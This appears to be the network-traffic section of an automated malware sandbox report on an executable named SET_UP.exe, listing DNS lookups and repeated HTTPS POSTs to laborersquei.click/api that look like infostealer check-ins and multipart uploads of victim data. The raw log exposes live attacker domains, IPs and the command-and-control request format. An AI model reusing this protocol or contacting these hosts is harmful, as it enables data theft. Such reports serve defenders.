                                                                                                                                          Dec 25, 2024 22:17:43.990660906 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.993841887 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.994738102 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.994755983 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.994832039 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.994839907 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.997875929 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.998692989 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.998709917 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.998773098 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.998780966 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.001832008 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.166316986 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.166335106 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.166412115 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.166441917 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.166536093 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.169899940 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.169914961 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.169977903 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.169987917 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.170089960 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.174042940 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.174058914 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.174130917 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.174140930 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.174211979 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.177385092 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.177403927 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.177462101 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.177476883 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.177562952 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.181541920 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.181559086 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.181628942 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.181638002 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.181870937 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.185091972 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.185111046 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.185180902 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.185189962 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.185266972 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.189305067 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.189321041 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.189388990 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.189397097 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.189480066 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.193123102 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.193137884 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.193202972 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.193212032 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.193253040 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.378156900 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.378180027 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.378235102 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.378268003 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.378287077 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.378353119 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.381603003 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.381618977 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.381652117 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.381659985 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.381696939 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.381696939 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.385790110 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.385803938 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.385889053 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.385898113 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.386008024 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.389225006 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.389240980 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.389277935 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.389329910 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.389329910 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.389339924 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.389359951 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.389415026 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.398392916 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.398407936 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.398422003 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.398428917 CET44349744172.67.214.186192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 25, 2024 22:17:11.197670937 CET | 53590 | 53 | 192.168.2.4 | 1.1.1.1
Dec 25, 2024 22:17:11.522824049 CET | 53 | 53590 | 1.1.1.1 | 192.168.2.4
Dec 25, 2024 22:17:29.195683956 CET | 63342 | 53 | 192.168.2.4 | 1.1.1.1
Dec 25, 2024 22:17:29.427556992 CET | 53 | 63342 | 1.1.1.1 | 192.168.2.4
Dec 25, 2024 22:17:29.431082010 CET | 49317 | 53 | 192.168.2.4 | 1.1.1.1
Dec 25, 2024 22:17:29.785937071 CET | 53 | 49317 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 25, 2024 22:17:11.197670937 CET | 192.168.2.4 | 1.1.1.1 | 0x3d93 | Standard query (0) | laborersquei.click | A (IP address) | IN (0x0001) | false
Dec 25, 2024 22:17:29.195683956 CET | 192.168.2.4 | 1.1.1.1 | 0xf2b4 | Standard query (0) | neqi.shop | A (IP address) | IN (0x0001) | false
Dec 25, 2024 22:17:29.431082010 CET | 192.168.2.4 | 1.1.1.1 | 0xe755 | Standard query (0) | klipsyzogey.shop | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 25, 2024 22:17:11.522824049 CET | 1.1.1.1 | 192.168.2.4 | 0x3d93 | No error (0) | laborersquei.click | | 104.21.89.250 | A (IP address) | IN (0x0001) | false
Dec 25, 2024 22:17:11.522824049 CET | 1.1.1.1 | 192.168.2.4 | 0x3d93 | No error (0) | laborersquei.click | | 172.67.166.49 | A (IP address) | IN (0x0001) | false
Dec 25, 2024 22:17:29.427556992 CET | 1.1.1.1 | 192.168.2.4 | 0xf2b4 | Name error (3) | neqi.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 25, 2024 22:17:29.785937071 CET | 1.1.1.1 | 192.168.2.4 | 0xe755 | No error (0) | klipsyzogey.shop | | 172.67.214.186 | A (IP address) | IN (0x0001) | false
Dec 25, 2024 22:17:29.785937071 CET | 1.1.1.1 | 192.168.2.4 | 0xe755 | No error (0) | klipsyzogey.shop | | 104.21.23.250 | A (IP address) | IN (0x0001) | false

                                                                                                                                          • laborersquei.click
                                                                                                                                          • klipsyzogey.shop

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.21.89.250 | 443 | 6556 | C:\Users\user\Desktop\SET_UP.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-25 21:17:12 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 8
                                                                                                                                          Host: laborersquei.click
2024-12-25 21:17:12 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                          Data Ascii: act=life
2024-12-25 21:17:13 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:13 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=uss5cevt8o6c95s2n5g4f4u2sp; expires=Sun, 20 Apr 2025 15:03:52 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YH1g4%2Bfwi7A3Z3MuFByPzWNq6NMOd0M8vbby%2BN1%2BcdT8LZ6zVm7A%2F08grQeOXgBXpDNXgmv%2B5WhOVwA1SR0C2rJpf1yAATGjgfipawaJOQgoyMYcnnK7VD37%2FK0JyES70kMwevg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdb4c6c2f7d26-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1797&min_rtt=1791&rtt_var=684&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1585233&cwnd=205&unsent_bytes=0&cid=798cbee67082e534&ts=790&x=0"
2024-12-25 21:17:13 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                          Data Ascii: 2ok
                                                                                                                                           2024-12-25 21:17:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                           1 | 192.168.2.4 | 49731 | 104.21.89.250 | 443 | 6556 | C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                                                           2024-12-25 21:17:14 UTC | 266 | OUT | POST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 80
                                                                                                                                          Host: laborersquei.click
                                                                                                                                           2024-12-25 21:17:14 UTC | 80 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                                           Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                                                           2024-12-25 21:17:15 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:15 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=fll8tvsm3jabckqjuifchl582j; expires=Sun, 20 Apr 2025 15:03:54 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UJrKU%2B07CSlja6RH6mqxt3yEpiULt85Itl9qQu4FvZaTYTMneXDWBXO5FtRyQmEYS%2BZ5TgNffK2BpGUvowOSmlXZ3K5KElpR0adt3KLzOefq%2F5Igsis5mW68A8jbqS59zyQ42HE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdb58fc16f78d-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1625&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=982&delivery_rate=1790312&cwnd=100&unsent_bytes=0&cid=b9dd03c176653fc4&ts=753&x=0"


                                                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                           2 | 192.168.2.4 | 49732 | 104.21.89.250 | 443 | 6556 | C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                                                           2024-12-25 21:17:16 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=YOBRJ4S6
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 18104
                                                                                                                                          Host: laborersquei.click
                                                                                                                                           2024-12-25 21:17:16 UTC | 15331 | OUT | Data Raw: 2d 2d 59 4f 42 52 4a 34 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 37 31 37 33 37 30 30 43 45 42 41 31 37 38 42 38 35 31 35 34 43 39 34 32 31 41 31 38 37 0d 0a 2d 2d 59 4f 42 52 4a 34 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 4f 42 52 4a 34 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 59 4f 42 52 4a 34 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
                                                                                                                                          Data Ascii: --YOBRJ4S6Content-Disposition: form-data; name="hwid"5A07173700CEBA178B85154C9421A187--YOBRJ4S6Content-Disposition: form-data; name="pid"2--YOBRJ4S6Content-Disposition: form-data; name="lid"hRjzG3--ELVIRA--YOBRJ4S6Content-Disposi
                                                                                                                                           2024-12-25 21:17:17 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:17 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=9ep97fqg2f0lt3bnv00lqhgokn; expires=Sun, 20 Apr 2025 15:03:56 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lGPn%2FOAEYQiKY6eWPogQ9xpnge655EH9k4yB2XygfK1J0UowpVzR7L1mlWCCENbsRwggU6WQLfRmS4CbbU7YG4wRuIHIW1c9xaMNraoq9uSGFNqLy8MTp%2FYtInhE11ndWVWMO4M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdb65beef72b7-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1793&rtt_var=684&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19058&delivery_rate=1586956&cwnd=192&unsent_bytes=0&cid=74cb665c8936998c&ts=999&x=0"
                                                                                                                                           2024-12-25 21:17:17 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                           2024-12-25 21:17:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                           3 | 192.168.2.4 | 49733 | 104.21.89.250 | 443 | 6556 | C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                                                           2024-12-25 21:17:19 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=UH1202JSAWTJPCRC47V
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 8791
                                                                                                                                          Host: laborersquei.click
                                                                                                                                           2024-12-25 21:17:19 UTC | 8791 | OUT | Data Raw: 2d 2d 55 48 31 32 30 32 4a 53 41 57 54 4a 50 43 52 43 34 37 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 37 31 37 33 37 30 30 43 45 42 41 31 37 38 42 38 35 31 35 34 43 39 34 32 31 41 31 38 37 0d 0a 2d 2d 55 48 31 32 30 32 4a 53 41 57 54 4a 50 43 52 43 34 37 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 48 31 32 30 32 4a 53 41 57 54 4a 50 43 52 43 34 37 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c
                                                                                                                                          Data Ascii: --UH1202JSAWTJPCRC47VContent-Disposition: form-data; name="hwid"5A07173700CEBA178B85154C9421A187--UH1202JSAWTJPCRC47VContent-Disposition: form-data; name="pid"2--UH1202JSAWTJPCRC47VContent-Disposition: form-data; name="lid"hRjzG3--EL
                                                                                                                                           2024-12-25 21:17:20 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:19 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=5612q492h6oth2efi5t1r8nmco; expires=Sun, 20 Apr 2025 15:03:58 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VDcoaGiUgwcrJVv6aA9F3SeVuf545YOqa2qRZ1vcgdJZ%2BXNdFnK8%2FccbmsTGpscxMBhEcdhxGimU9kBzJs4KGvzzhFrLViqXB5Qvkopn86nmdaIb4fv3s9rpsKQ4Kaasbp5DA%2Fw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdb744c850c84-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1613&rtt_var=615&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9733&delivery_rate=1810291&cwnd=150&unsent_bytes=0&cid=0acd89819c8311a5&ts=868&x=0"
2024-12-25 21:17:20 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-25 21:17:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49736 | 104.21.89.250 | 443 | 6556 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 21:17:21 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=LB6A8ZHZIG3X
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 20402
                                                                                                                                          Host: laborersquei.click
2024-12-25 21:17:21 UTC | 15331 | OUT | Data Ascii: --LB6A8ZHZIG3XContent-Disposition: form-data; name="hwid"5A07173700CEBA178B85154C9421A187--LB6A8ZHZIG3XContent-Disposition: form-data; name="pid"3--LB6A8ZHZIG3XContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--LB6A8ZHZIG3X
2024-12-25 21:17:21 UTC | 5071 | OUT | Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-25 21:17:22 UTC | 1136 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:22 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=uvueqq4v02dblc110fqmd6jg3e; expires=Sun, 20 Apr 2025 15:04:01 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vxoCdUmaKhF47ayBOZpof7LAMypCPEz4eXTLXTcW%2FTcAcDp05mawJ5Gwg053zSL0QoI0v0HjrBhxBJ9r39%2F7qRBEiROJOe9aAqZWCNKmP%2Bzm8pAmP98731MGwTbxvMkI3%2F%2BqIHY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdb837fca0f8c-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1602&rtt_var=614&sent=17&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21360&delivery_rate=1764350&cwnd=212&unsent_bytes=0&cid=21e3c41829427675&ts=1030&x=0"
2024-12-25 21:17:22 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-25 21:17:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49739 | 104.21.89.250 | 443 | 6556 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 21:17:24 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=S3YCAMS19M3H
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 1211
                                                                                                                                          Host: laborersquei.click
2024-12-25 21:17:24 UTC | 1211 | OUT | Data Ascii: --S3YCAMS19M3HContent-Disposition: form-data; name="hwid"5A07173700CEBA178B85154C9421A187--S3YCAMS19M3HContent-Disposition: form-data; name="pid"1--S3YCAMS19M3HContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--S3YCAMS19M3H
2024-12-25 21:17:24 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:24 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
